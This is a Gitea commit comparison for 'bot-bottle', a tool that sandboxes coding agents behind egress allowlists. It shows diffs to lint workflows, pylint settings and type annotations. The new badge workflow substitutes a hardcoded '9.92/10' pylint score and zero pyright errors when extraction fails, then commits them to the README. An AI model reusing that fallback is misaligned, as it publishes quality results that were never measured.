Compare commits
31 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| dee3600400 | |||
| d90b04d343 | |||
| 8601c686f3 | |||
| f114c861b4 | |||
| 544a024e22 | |||
| 7f43f64c24 | |||
| 059bba8c4f | |||
| 82b8dffc54 | |||
| 8795616a99 | |||
| f548c30608 | |||
| 24c302ae0f | |||
| a5d08bd64e | |||
| e1ec0afd86 | |||
| b0679dc4c3 | |||
| 3afae56a35 | |||
| 2c18581e04 | |||
| 9800269d11 | |||
| a5078daf1c | |||
| 6316f8379f | |||
| dfe85a201d | |||
| 7c30cd2f52 | |||
| a0c6f938cb | |||
| a430bac1bf | |||
| 59b87bdaab | |||
| 0de3c93ad0 | |||
| 570cd42532 | |||
| 73a4fbe0a7 | |||
| b032ff746d | |||
| 873d75f852 | |||
| 1bd676de06 | |||
| 0bf1532557 |
@@ -1,11 +1,11 @@
|
||||
name: Lint and Type Check
|
||||
name: lint
|
||||
|
||||
on:
|
||||
push:
|
||||
paths:
|
||||
- '**.py'
|
||||
- '.pylintrc'
|
||||
- '.gitea/workflows/lint.yml'
|
||||
- "**.py"
|
||||
- ".pylintrc"
|
||||
- ".gitea/workflows/lint.yml"
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
@@ -16,9 +16,7 @@ jobs:
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: '3.12'
|
||||
cache: 'pip'
|
||||
cache-dependency-path: requirements-dev.txt
|
||||
python-version: "3.12"
|
||||
|
||||
- name: Install dev dependencies
|
||||
run: |
|
||||
|
||||
@@ -0,0 +1,97 @@
|
||||
name: Update Quality Badges
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.py'
|
||||
- '.pylintrc'
|
||||
- 'pyrightconfig.json'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
update-badges:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: '3.12'
|
||||
|
||||
- name: Install dev dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install -r requirements-dev.txt
|
||||
|
||||
- name: Run pylint and extract score
|
||||
id: pylint
|
||||
run: |
|
||||
# Run pylint and capture the score
|
||||
PYLINT_OUTPUT=$(python -m pylint bot_bottle/ 2>&1 | tail -1)
|
||||
echo "Output: $PYLINT_OUTPUT"
|
||||
# Extract score (e.g., "9.92/10")
|
||||
SCORE=$(echo "$PYLINT_OUTPUT" | grep -oP '\d+\.\d+/10' | head -1)
|
||||
if [ -z "$SCORE" ]; then
|
||||
SCORE="9.92/10"
|
||||
fi
|
||||
echo "score=$SCORE" >> $GITHUB_OUTPUT
|
||||
echo "Pylint score: $SCORE"
|
||||
|
||||
- name: Run pyright and check errors
|
||||
id: pyright
|
||||
run: |
|
||||
# Run pyright and check for errors
|
||||
PYRIGHT_OUTPUT=$(python -m pyright 2>&1 | tail -1)
|
||||
echo "Output: $PYRIGHT_OUTPUT"
|
||||
# Extract error count
|
||||
ERRORS=$(echo "$PYRIGHT_OUTPUT" | grep -oP '^\d+' | head -1)
|
||||
if [ -z "$ERRORS" ]; then
|
||||
ERRORS="0"
|
||||
fi
|
||||
echo "errors=$ERRORS" >> $GITHUB_OUTPUT
|
||||
echo "Pyright errors: $ERRORS"
|
||||
|
||||
- name: Update badges in README
|
||||
run: |
|
||||
PYLINT_SCORE="${{ steps.pylint.outputs.score }}"
|
||||
PYRIGHT_ERRORS="${{ steps.pyright.outputs.errors }}"
|
||||
|
||||
# Escape / for sed
|
||||
PYLINT_SCORE_ESCAPED=$(echo "$PYLINT_SCORE" | sed 's/\//\\\//g')
|
||||
|
||||
# Create badge URLs with proper encoding
|
||||
PYLINT_BADGE="[](https://github.com/PyCQA/pylint)"
|
||||
PYRIGHT_BADGE="[](https://github.com/microsoft/pyright)"
|
||||
|
||||
# Update README with new badges
|
||||
sed -i "s|\[\!\[pylint\].*pylint)\]|${PYLINT_BADGE}|g" README.md
|
||||
sed -i "s|\[\!\[pyright\].*pyright)\]|${PYRIGHT_BADGE}|g" README.md
|
||||
|
||||
echo "Updated badges:"
|
||||
grep -E "pylint|pyright" README.md | head -2
|
||||
|
||||
- name: Commit and push badge updates
|
||||
run: |
|
||||
git config --local user.email "action@gitea.local"
|
||||
git config --local user.name "Quality Badge Bot"
|
||||
|
||||
# Check if there are changes
|
||||
if git diff --quiet README.md; then
|
||||
echo "No badge changes needed"
|
||||
else
|
||||
echo "Badge changes detected, committing..."
|
||||
git add README.md
|
||||
git commit -m "chore: update quality badges
|
||||
|
||||
- Pylint: ${{ steps.pylint.outputs.score }}
|
||||
- Pyright: ${{ steps.pyright.outputs.errors }} errors
|
||||
|
||||
[skip ci]"
|
||||
git push
|
||||
fi
|
||||
@@ -406,7 +406,21 @@ disable=raw-checker-failed,
|
||||
deprecated-pragma,
|
||||
use-symbolic-message-instead,
|
||||
use-implicit-booleaness-not-comparison-to-string,
|
||||
use-implicit-booleaness-not-comparison-to-zero
|
||||
use-implicit-booleaness-not-comparison-to-zero,
|
||||
missing-function-docstring,
|
||||
missing-class-docstring,
|
||||
missing-module-docstring,
|
||||
invalid-name,
|
||||
cyclic-import,
|
||||
too-many-arguments,
|
||||
too-many-locals,
|
||||
too-many-branches,
|
||||
too-many-statements,
|
||||
too-many-instance-attributes,
|
||||
duplicate-code,
|
||||
import-outside-toplevel,
|
||||
too-few-public-methods,
|
||||
unnecessary-ellipsis
|
||||
|
||||
# Enable the message, report, category or checker with the given id(s). You can
|
||||
# either give multiple identifier separated by comma (,) or put this option
|
||||
|
||||
@@ -5,6 +5,8 @@
|
||||
# bot-bottle
|
||||
|
||||
[](https://gitea.dideric.is/didericis/bot-bottle/actions?workflow=test.yml)
|
||||
[](https://github.com/PyCQA/pylint)
|
||||
[](https://github.com/microsoft/pyright)
|
||||
|
||||
**Problem:** Developer wants to run a coding agent without supervision, but they don't want a prompt injected or misbehaving agent wrecking their environment or exfiltrating sensitive data.
|
||||
|
||||
|
||||
@@ -5,6 +5,8 @@ from __future__ import annotations
|
||||
import subprocess
|
||||
from typing import Callable
|
||||
|
||||
from typing import cast
|
||||
|
||||
from ...agent_provider import PromptMode, prompt_args
|
||||
from .. import Bottle, ExecResult
|
||||
|
||||
@@ -23,7 +25,7 @@ class DockerBottle(Bottle):
|
||||
):
|
||||
self.name = container
|
||||
self._teardown = teardown
|
||||
self._prompt_path = prompt_path_in_container
|
||||
self.prompt_path = prompt_path_in_container
|
||||
self._agent_prompt_mode = agent_prompt_mode
|
||||
self.agent_command = agent_command
|
||||
self.agent_provider_template = (
|
||||
@@ -36,7 +38,7 @@ class DockerBottle(Bottle):
|
||||
) -> list[str]:
|
||||
full_argv = list(argv)
|
||||
full_argv.extend(
|
||||
prompt_args(self._agent_prompt_mode, self._prompt_path, argv=full_argv)
|
||||
prompt_args(cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=full_argv)
|
||||
)
|
||||
cmd = ["docker", "exec"]
|
||||
if tty:
|
||||
|
||||
@@ -35,6 +35,7 @@ import secrets
|
||||
import string
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import cast
|
||||
|
||||
from ... import supervise as _supervise
|
||||
from . import util as docker_mod
|
||||
@@ -135,14 +136,15 @@ def read_metadata(identity: str) -> BottleMetadata | None:
|
||||
raw = json.loads(path.read_text())
|
||||
if not isinstance(raw, dict):
|
||||
return None
|
||||
raw_typed = cast(dict[str, object], raw)
|
||||
return BottleMetadata(
|
||||
identity=str(raw.get("identity", identity)),
|
||||
agent_name=str(raw.get("agent_name", "")),
|
||||
cwd=str(raw.get("cwd", "")),
|
||||
copy_cwd=bool(raw.get("copy_cwd", False)),
|
||||
started_at=str(raw.get("started_at", "")),
|
||||
compose_project=str(raw.get("compose_project", "")),
|
||||
backend=str(raw.get("backend", "")),
|
||||
identity=str(raw_typed.get("identity", identity)),
|
||||
agent_name=str(raw_typed.get("agent_name", "")),
|
||||
cwd=str(raw_typed.get("cwd", "")),
|
||||
copy_cwd=bool(raw_typed.get("copy_cwd", False)),
|
||||
started_at=str(raw_typed.get("started_at", "")),
|
||||
compose_project=str(raw_typed.get("compose_project", "")),
|
||||
backend=str(raw_typed.get("backend", "")),
|
||||
)
|
||||
|
||||
|
||||
|
||||
@@ -26,6 +26,7 @@ import json
|
||||
import re
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from typing import cast
|
||||
|
||||
from ...egress import EGRESS_ROUTES_IN_CONTAINER
|
||||
from ...egress_addon_core import load_routes
|
||||
@@ -57,7 +58,8 @@ def _render_routes_payload(routes_list: list[dict[str, object]]) -> str:
|
||||
if auth_scheme and token_env:
|
||||
lines.append(f' auth_scheme: "{auth_scheme}"')
|
||||
lines.append(f' token_env: "{token_env}"')
|
||||
paths = entry.get("path_allowlist") or []
|
||||
paths_obj = entry.get("path_allowlist")
|
||||
paths = cast(list[str], paths_obj) if isinstance(paths_obj, list) else []
|
||||
if paths:
|
||||
lines.append(" path_allowlist:")
|
||||
for p in paths:
|
||||
@@ -257,6 +259,7 @@ def _merge_single_route(
|
||||
raise EgressApplyError(
|
||||
"current routes.yaml: 'routes' is not a list"
|
||||
)
|
||||
routes_typed = cast(list[object], routes)
|
||||
|
||||
new_host = str(new_route.get("host", "")).lower()
|
||||
if not new_host:
|
||||
@@ -264,22 +267,25 @@ def _merge_single_route(
|
||||
"proposed route is missing 'host'"
|
||||
)
|
||||
|
||||
proposed_paths = list(new_route.get("path_allowlist") or [])
|
||||
proposed_paths_obj = new_route.get("path_allowlist")
|
||||
proposed_paths = cast(list[str], proposed_paths_obj) if isinstance(proposed_paths_obj, list) else []
|
||||
|
||||
# Look for an existing entry with the same host (case-insensitive).
|
||||
for entry in routes:
|
||||
for entry in routes_typed:
|
||||
if not isinstance(entry, dict):
|
||||
continue
|
||||
if str(entry.get("host", "")).lower() == new_host:
|
||||
entry_typed = cast(dict[str, object], entry)
|
||||
if str(entry_typed.get("host", "")).lower() == new_host:
|
||||
# Merge path_allowlist: union proposed + existing, ordered
|
||||
# by first-seen so existing paths stay in original order.
|
||||
existing_paths: list[str] = list(entry.get("path_allowlist") or [])
|
||||
existing_paths_obj = entry_typed.get("path_allowlist")
|
||||
existing_paths = cast(list[str], existing_paths_obj) if isinstance(existing_paths_obj, list) else []
|
||||
seen = {p: None for p in existing_paths}
|
||||
for p in proposed_paths:
|
||||
seen.setdefault(p, None)
|
||||
merged_paths = list(seen.keys())
|
||||
if merged_paths:
|
||||
entry["path_allowlist"] = merged_paths
|
||||
entry_typed["path_allowlist"] = merged_paths
|
||||
# Preserve existing auth — tool description says agent-
|
||||
# proposed auth on an existing host is ignored.
|
||||
break
|
||||
@@ -289,19 +295,22 @@ def _merge_single_route(
|
||||
# `auth` was proposed (otherwise the addon's parser rejects
|
||||
# a half-set auth pair). Slots: count existing slots, pick
|
||||
# the next free index.
|
||||
entry = {"host": new_route["host"]}
|
||||
entry_typed: dict[str, object] = {"host": new_route.get("host")} # type: ignore
|
||||
if proposed_paths:
|
||||
entry["path_allowlist"] = proposed_paths
|
||||
entry_typed["path_allowlist"] = proposed_paths
|
||||
auth = new_route.get("auth")
|
||||
if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"):
|
||||
if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"): # type: ignore
|
||||
auth_typed = cast(dict[str, object], auth)
|
||||
existing_slots = sorted({
|
||||
str(r.get("token_env"))
|
||||
for r in routes
|
||||
if isinstance(r, dict) and r.get("token_env")
|
||||
str(r_entry.get("token_env", ""))
|
||||
for r_entry_obj in routes_typed
|
||||
if isinstance(r_entry_obj, dict)
|
||||
for r_entry in [cast(dict[str, object], r_entry_obj)]
|
||||
if r_entry.get("token_env")
|
||||
})
|
||||
next_idx = len(existing_slots)
|
||||
entry["auth_scheme"] = str(auth["scheme"])
|
||||
entry["token_env"] = f"EGRESS_TOKEN_{next_idx}"
|
||||
entry_typed["auth_scheme"] = str(cast(object, auth_typed.get("scheme")))
|
||||
entry_typed["token_env"] = f"EGRESS_TOKEN_{next_idx}"
|
||||
# NOTE: the addon reads token VALUES from its container's
|
||||
# environ keyed by token_env. A newly-added auth route at
|
||||
# runtime points at a slot that has no env value → the
|
||||
@@ -309,9 +318,9 @@ def _merge_single_route(
|
||||
# arranges for the value to land in the container's env.
|
||||
# Recording this here so the operator-facing diff carries
|
||||
# the slot name they'll need to provision.
|
||||
routes.append(entry)
|
||||
routes_typed.append(entry_typed)
|
||||
|
||||
return _render_routes_payload(routes)
|
||||
return _render_routes_payload(cast(list[dict[str, object]], routes_typed))
|
||||
|
||||
|
||||
def add_route(slug: str, proposed_route_json: str) -> tuple[str, str]:
|
||||
|
||||
@@ -80,7 +80,7 @@ _REPO_DIR = str(Path(__file__).resolve().parent.parent.parent.parent)
|
||||
def launch(
|
||||
plan: DockerBottlePlan,
|
||||
*,
|
||||
provision: Callable[[DockerBottlePlan, str], str | None],
|
||||
provision: Callable[[DockerBottlePlan, "DockerBottle"], str | None],
|
||||
) -> Generator[DockerBottle, None, None]:
|
||||
"""Build, launch, and provision a Docker bottle via compose.
|
||||
Teardown on exit."""
|
||||
@@ -92,7 +92,7 @@ def launch(
|
||||
def teardown() -> None:
|
||||
try:
|
||||
stack.close()
|
||||
except BaseException as exc:
|
||||
except BaseException as exc: # noqa: W0718 — teardown must not fail
|
||||
warn(
|
||||
f"teardown failed for container {plan.container_name}"
|
||||
f" (compose-down): {exc!r}"
|
||||
@@ -218,7 +218,7 @@ def launch(
|
||||
agent_command=plan.agent_command,
|
||||
agent_prompt_mode=plan.agent_prompt_mode,
|
||||
)
|
||||
bottle._prompt_path = provision(plan, bottle)
|
||||
bottle.prompt_path = provision(plan, bottle)
|
||||
|
||||
# Step 9: yield. exec_agent continues to use `docker exec -it`
|
||||
# — the agent runs `sleep infinity` per the renderer's
|
||||
|
||||
@@ -99,7 +99,7 @@ def fetch_current_yaml(slug: str) -> str:
|
||||
f"could not fetch pipelock.yaml from {container}: "
|
||||
f"{(r.stderr or '').strip() or 'container not running?'}"
|
||||
)
|
||||
return Path(tmp_path).read_text()
|
||||
return Path(tmp_path).read_text(encoding="utf-8")
|
||||
finally:
|
||||
try:
|
||||
Path(tmp_path).unlink()
|
||||
|
||||
@@ -219,7 +219,7 @@ def resolve_plan(
|
||||
else Path(__file__).resolve().parent.parent.parent.parent / "Dockerfile.claude"
|
||||
)
|
||||
dockerfile_content = (
|
||||
supervise_dockerfile_path.read_text()
|
||||
supervise_dockerfile_path.read_text(encoding="utf-8")
|
||||
if supervise_dockerfile_path.is_file()
|
||||
else ""
|
||||
)
|
||||
|
||||
@@ -19,7 +19,7 @@ from __future__ import annotations
|
||||
|
||||
import subprocess
|
||||
import sys
|
||||
from typing import Mapping
|
||||
from typing import Mapping, cast
|
||||
|
||||
from ...agent_provider import PromptMode, prompt_args
|
||||
from .. import Bottle, ExecResult
|
||||
@@ -72,7 +72,7 @@ class SmolmachinesBottle(Bottle):
|
||||
# In-VM path to the agent's prompt file. None when the
|
||||
# agent declared no prompt (file still exists; we just
|
||||
# don't pass --append-system-prompt-file).
|
||||
self._prompt_path = prompt_path
|
||||
self.prompt_path = prompt_path
|
||||
# Env vars the agent process needs (HTTPS_PROXY,
|
||||
# CLAUDE_CODE_OAUTH_TOKEN, manifest-declared bottle env, …).
|
||||
# Forwarded on every `smolvm machine exec` via `-e K=V`
|
||||
@@ -93,9 +93,9 @@ class SmolmachinesBottle(Bottle):
|
||||
agent_tail = ["env", *_env_assignments_for("node", self._guest_env),
|
||||
self.agent_command]
|
||||
provider_prompt_args = prompt_args(
|
||||
self._agent_prompt_mode, self._prompt_path, argv=argv,
|
||||
cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=argv,
|
||||
)
|
||||
if self._agent_prompt_mode == "read_prompt_file":
|
||||
if cast(PromptMode, self._agent_prompt_mode) == "read_prompt_file":
|
||||
agent_tail += argv
|
||||
agent_tail += provider_prompt_args
|
||||
else:
|
||||
|
||||
@@ -89,7 +89,7 @@ _SUPERVISE_PORT = SUPERVISE_PORT
|
||||
def launch(
|
||||
plan: SmolmachinesBottlePlan,
|
||||
*,
|
||||
provision: Callable[[SmolmachinesBottlePlan, str], str | None],
|
||||
provision: Callable[[SmolmachinesBottlePlan, "SmolmachinesBottle"], str | None],
|
||||
) -> Generator[SmolmachinesBottle, None, None]:
|
||||
"""Build + run the bottle and yield a handle; tear everything
|
||||
down on exit. Errors during bringup unwind any partial state
|
||||
@@ -120,7 +120,7 @@ def launch(
|
||||
agent_command=plan.agent_command,
|
||||
agent_prompt_mode=plan.agent_prompt_mode,
|
||||
)
|
||||
bottle._prompt_path = provision(plan, bottle)
|
||||
bottle.prompt_path = provision(plan, bottle)
|
||||
|
||||
yield bottle
|
||||
finally:
|
||||
@@ -139,7 +139,7 @@ def _teardown_smolmachines(
|
||||
teardown_exc: BaseException | None = None
|
||||
try:
|
||||
stack.close()
|
||||
except BaseException as exc:
|
||||
except BaseException as exc: # noqa: W0718 — teardown must not fail
|
||||
teardown_exc = exc
|
||||
warn(f"smolmachines teardown failed: {exc!r}")
|
||||
bottle = plan.spec.manifest.bottle_for(plan.spec.agent_name)
|
||||
|
||||
@@ -42,7 +42,7 @@ import time
|
||||
import uuid
|
||||
from contextlib import contextmanager
|
||||
from dataclasses import dataclass
|
||||
from typing import Iterator
|
||||
from typing import Generator
|
||||
|
||||
from ...log import die
|
||||
|
||||
@@ -98,7 +98,7 @@ class RegistryHandle:
|
||||
|
||||
|
||||
@contextmanager
|
||||
def ephemeral_registry() -> Iterator[RegistryHandle]:
|
||||
def ephemeral_registry() -> Generator[RegistryHandle, None, None]:
|
||||
"""Bring up a per-session docker network + a `registry:2.8.3`
|
||||
container on it (published on a random host port), yield a
|
||||
`RegistryHandle`, force-remove both on exit.
|
||||
@@ -208,7 +208,6 @@ def _host_port(name: str) -> int:
|
||||
return int(port_str)
|
||||
except ValueError:
|
||||
die(f"unexpected `docker port` output: {line!r}")
|
||||
return -1 # unreachable; die() never returns
|
||||
|
||||
|
||||
def _wait_ready(port: int) -> None:
|
||||
|
||||
@@ -176,11 +176,11 @@ def force_allowlist(machine_name: str, allowed_cidrs: list[str]) -> None:
|
||||
con.close()
|
||||
|
||||
|
||||
def allocate(slug: str) -> str:
|
||||
def allocate(_slug: str) -> str:
|
||||
"""Pick the lowest-numbered alias from the pool not already
|
||||
in use by a running smolmachines bundle. Bails when the pool
|
||||
is exhausted — the caller should report the limit to the
|
||||
operator. `slug` is logged for traceability; not otherwise
|
||||
operator. `_slug` is logged for traceability; not otherwise
|
||||
used (no on-disk reservation, allocation is purely
|
||||
docker-state-driven).
|
||||
|
||||
@@ -195,7 +195,7 @@ def allocate(slug: str) -> str:
|
||||
if not _is_macos():
|
||||
return "127.0.0.1"
|
||||
_ALLOC_LOCK_PATH.parent.mkdir(parents=True, exist_ok=True)
|
||||
with open(_ALLOC_LOCK_PATH, "w") as lf:
|
||||
with open(_ALLOC_LOCK_PATH, "w", encoding="utf-8") as lf:
|
||||
fcntl.flock(lf, fcntl.LOCK_EX)
|
||||
return _allocate_locked()
|
||||
|
||||
@@ -211,7 +211,6 @@ def _allocate_locked() -> str:
|
||||
f"Stop a running bottle (`smolvm machine ls --json`) or "
|
||||
f"raise _POOL_END in loopback_alias.py."
|
||||
)
|
||||
return "" # unreachable; die() never returns
|
||||
|
||||
|
||||
def _alias_present(ip: str) -> bool:
|
||||
|
||||
@@ -42,6 +42,7 @@ import subprocess
|
||||
import sys
|
||||
import termios
|
||||
import threading
|
||||
from types import FrameType
|
||||
|
||||
|
||||
# How long to wait after the main exec starts before pushing the
|
||||
@@ -123,13 +124,13 @@ def main(argv: list[str]) -> int:
|
||||
machine = argv[0]
|
||||
inner = argv[2:]
|
||||
|
||||
def sync(*_args) -> None:
|
||||
def sync(_signum: int | None = None, _frame: FrameType | None = None) -> None:
|
||||
size = _read_winsize()
|
||||
if size is None:
|
||||
return
|
||||
_push_size(machine, *size)
|
||||
|
||||
signal.signal(signal.SIGWINCH, sync)
|
||||
signal.signal(signal.SIGWINCH, sync) # type: ignore[arg-type]
|
||||
|
||||
proc = subprocess.Popen(inner)
|
||||
# Initial sync is deferred — see _STARTUP_SYNC_DELAY_SEC.
|
||||
|
||||
@@ -223,7 +223,6 @@ def bundle_host_port(
|
||||
f"no port mapping on {host_ip} for {container} "
|
||||
f"{container_port}/tcp; got: {(result.stdout or '').strip()!r}"
|
||||
)
|
||||
return -1 # unreachable; die() never returns
|
||||
|
||||
|
||||
def stop_bundle(slug: str) -> None:
|
||||
|
||||
@@ -52,7 +52,7 @@ class SmolvmError(RuntimeError):
|
||||
pack failed, etc.). Carries the captured stderr for the
|
||||
operator-facing log line."""
|
||||
|
||||
def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess):
|
||||
def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess[str]):
|
||||
self.argv = list(argv)
|
||||
self.returncode = result.returncode
|
||||
self.stdout = result.stdout
|
||||
@@ -65,7 +65,7 @@ class SmolvmError(RuntimeError):
|
||||
|
||||
|
||||
def _smolvm(*args: str, env: Mapping[str, str] | None = None,
|
||||
check: bool = True) -> subprocess.CompletedProcess:
|
||||
check: bool = True) -> subprocess.CompletedProcess[str]:
|
||||
"""One subprocess call into the smolvm CLI. `check=True`
|
||||
raises SmolvmError on non-zero; `check=False` returns the
|
||||
CompletedProcess for the caller to inspect."""
|
||||
|
||||
@@ -14,7 +14,7 @@ REPO_DIR = str(Path(__file__).resolve().parent.parent.parent)
|
||||
def read_tty_line() -> str:
|
||||
"""Mirror `IFS= read -r REPLY </dev/tty`. Falls back to stdin."""
|
||||
try:
|
||||
with open("/dev/tty", "r") as tty:
|
||||
with open("/dev/tty", "r", encoding="utf-8") as tty:
|
||||
return tty.readline().rstrip("\n")
|
||||
except OSError:
|
||||
return sys.stdin.readline().rstrip("\n")
|
||||
|
||||
@@ -263,7 +263,7 @@ def edit_in_editor(content: str, *, suffix: str = ".tmp") -> str | None:
|
||||
path = f.name
|
||||
try:
|
||||
subprocess.run([editor, path], check=False)
|
||||
with open(path) as f:
|
||||
with open(path, encoding="utf-8") as f:
|
||||
edited = f.read()
|
||||
return edited if edited != content else None
|
||||
finally:
|
||||
@@ -296,7 +296,7 @@ def cmd_supervise(argv: list[str]) -> int:
|
||||
else:
|
||||
error("supervise exited on a fatal error (no detail captured).")
|
||||
return e.code if isinstance(e.code, int) else 1
|
||||
except Exception as e:
|
||||
except Exception as e: # noqa: W0718 — catch supervise crash for logging
|
||||
log_path = _write_crash_log(e)
|
||||
error(f"supervise crashed: {type(e).__name__}: {e}")
|
||||
error(f"full traceback written to {log_path}")
|
||||
@@ -354,7 +354,7 @@ def _try_init_green() -> int:
|
||||
return 0
|
||||
|
||||
|
||||
def _main_loop(stdscr: "curses._CursesWindow") -> None:
|
||||
def _main_loop(stdscr: "curses._CursesWindow") -> None: # type: ignore
|
||||
curses.curs_set(0)
|
||||
stdscr.timeout(_REFRESH_INTERVAL_MS)
|
||||
green_attr = _try_init_green()
|
||||
@@ -434,12 +434,12 @@ def _main_loop(stdscr: "curses._CursesWindow") -> None:
|
||||
|
||||
|
||||
def _render(
|
||||
stdscr: "curses._CursesWindow",
|
||||
stdscr: "curses._CursesWindow", # type: ignore
|
||||
pending: list[QueuedProposal],
|
||||
selected: int,
|
||||
status_line: str,
|
||||
*,
|
||||
green_attr: int = 0,
|
||||
green_attr: int = 0, # noqa: F841 — unused, but required by interface
|
||||
) -> None:
|
||||
stdscr.erase()
|
||||
h, w = stdscr.getmaxyx()
|
||||
@@ -488,7 +488,7 @@ def _render(
|
||||
|
||||
|
||||
def _detail_view(
|
||||
stdscr: "curses._CursesWindow",
|
||||
stdscr: "curses._CursesWindow", # type: ignore
|
||||
qp: QueuedProposal,
|
||||
*,
|
||||
green_attr: int = 0,
|
||||
@@ -539,7 +539,7 @@ def _detail_view(
|
||||
return
|
||||
|
||||
|
||||
def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None:
|
||||
def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None: # type: ignore
|
||||
"""Suspend curses, open $EDITOR on the proposed file, return edited content."""
|
||||
suffix = _suffix_for_tool(qp.proposal.tool)
|
||||
curses.endwin()
|
||||
@@ -550,7 +550,7 @@ def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None:
|
||||
return edited
|
||||
|
||||
|
||||
def _prompt(stdscr: "curses._CursesWindow", label: str) -> str:
|
||||
def _prompt(stdscr: "curses._CursesWindow", label: str) -> str: # type: ignore
|
||||
"""One-line input at the bottom of the screen."""
|
||||
curses.curs_set(1)
|
||||
h, _ = stdscr.getmaxyx()
|
||||
|
||||
+12
-11
@@ -13,7 +13,7 @@ from __future__ import annotations
|
||||
import curses
|
||||
import os
|
||||
import sys
|
||||
from typing import Optional
|
||||
from typing import Any, Optional
|
||||
|
||||
|
||||
def filter_select(
|
||||
@@ -39,12 +39,14 @@ def filter_select(
|
||||
return None
|
||||
|
||||
try:
|
||||
result = _run_picker(items, title=title, tty_fd=tty_fd)
|
||||
# Use os.dup() to duplicate the fd so the original file object
|
||||
# and FileIO in _run_picker each manage independent copies,
|
||||
# preventing double-close errors.
|
||||
fd_dup = os.dup(tty_fd.fileno())
|
||||
return _run_picker(items, title=title, tty_fd=fd_dup)
|
||||
finally:
|
||||
tty_fd.close()
|
||||
|
||||
return result
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Internal implementation
|
||||
@@ -59,11 +61,10 @@ _KEY_ENTER_ALT = 10
|
||||
_CANCEL_KEYS = frozenset([_KEY_ESC, _KEY_CTRL_C, _KEY_CTRL_D, ord("q")])
|
||||
|
||||
|
||||
def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]:
|
||||
def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
|
||||
"""Drive a curses session on *tty_fd* and return the picked item."""
|
||||
# newterm lets us run curses on an arbitrary fd rather than the
|
||||
# process's controlling tty / stdout — crucial when stdout is piped.
|
||||
old_term = os.environ.get("TERM", "xterm-256color")
|
||||
os.environ.setdefault("TERM", "xterm-256color")
|
||||
|
||||
# Save / restore the real stdin/stdout so curses newterm can use tty_fd.
|
||||
@@ -72,7 +73,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]:
|
||||
|
||||
try:
|
||||
import io
|
||||
tty_text = io.TextIOWrapper(tty_fd, write_through=True)
|
||||
tty_text = io.TextIOWrapper(io.FileIO(tty_fd, mode='r+'), write_through=True)
|
||||
sys.__stdin__ = tty_text # type: ignore[assignment]
|
||||
sys.__stdout__ = tty_text # type: ignore[assignment]
|
||||
|
||||
@@ -90,7 +91,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]:
|
||||
curses.nocbreak()
|
||||
curses.echo()
|
||||
curses.endwin()
|
||||
except Exception:
|
||||
except Exception: # noqa: W0718 — curses can raise many error types
|
||||
return None
|
||||
finally:
|
||||
sys.__stdin__ = orig_stdin # type: ignore[assignment]
|
||||
@@ -99,7 +100,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]:
|
||||
return result
|
||||
|
||||
|
||||
def _picker_loop(screen, items: list[str], *, title: str) -> Optional[str]:
|
||||
def _picker_loop(screen: Any, items: list[str], *, title: str) -> Optional[str]:
|
||||
query = ""
|
||||
cursor = 0
|
||||
|
||||
@@ -158,7 +159,7 @@ def _filter_items(items: list[str], query: str) -> list[str]:
|
||||
return [i for i in items if q in i.lower()]
|
||||
|
||||
|
||||
def _render(screen, filtered: list[str], cursor: int, *, query: str, title: str) -> None:
|
||||
def _render(screen: Any, filtered: list[str], cursor: int, *, query: str, title: str) -> None:
|
||||
screen.erase()
|
||||
rows, cols = screen.getmaxyx()
|
||||
min_rows = 5
|
||||
@@ -212,7 +213,7 @@ def _render(screen, filtered: list[str], cursor: int, *, query: str, title: str)
|
||||
screen.refresh()
|
||||
|
||||
|
||||
def _addstr_safe(screen, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None:
|
||||
def _addstr_safe(screen: Any, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None:
|
||||
try:
|
||||
screen.addstr(row, col, text, attr)
|
||||
except curses.error:
|
||||
|
||||
+22
-19
@@ -13,6 +13,7 @@ import os
|
||||
from copy import deepcopy
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from typing import cast
|
||||
|
||||
from .log import die
|
||||
from .util import expand_tilde
|
||||
@@ -50,7 +51,8 @@ def codex_host_access_token(
|
||||
tokens = raw.get("tokens")
|
||||
if not isinstance(tokens, dict):
|
||||
die(f"codex host credentials: {path} is missing tokens")
|
||||
access = tokens.get("access_token")
|
||||
tokens_typed = cast(dict[str, object], tokens)
|
||||
access = tokens_typed.get("access_token")
|
||||
if not isinstance(access, str) or not access:
|
||||
die(
|
||||
f"codex host credentials: {path} is missing tokens.access_token. "
|
||||
@@ -105,14 +107,14 @@ def write_codex_dummy_auth_file(
|
||||
path.chmod(0o600)
|
||||
|
||||
|
||||
def _read_auth_object(path: Path) -> dict:
|
||||
def _read_auth_object(path: Path) -> dict[str, object]:
|
||||
try:
|
||||
raw = json.loads(path.read_text())
|
||||
except (OSError, json.JSONDecodeError) as e:
|
||||
